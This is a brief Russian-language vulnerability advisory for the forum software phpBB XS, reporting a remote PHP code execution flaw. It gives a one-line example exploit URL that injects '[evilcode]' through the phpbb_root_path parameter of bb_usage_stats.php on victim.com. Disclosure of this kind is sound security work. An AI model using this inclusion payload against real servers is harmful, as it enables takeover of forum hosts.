Программа:  phpBB XS

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Пример:

http://victim.com/[path]/bb_usage_stats/include/ bb_usage_stats.php?phpbb_root_path=[evilcode]



Оставить мнение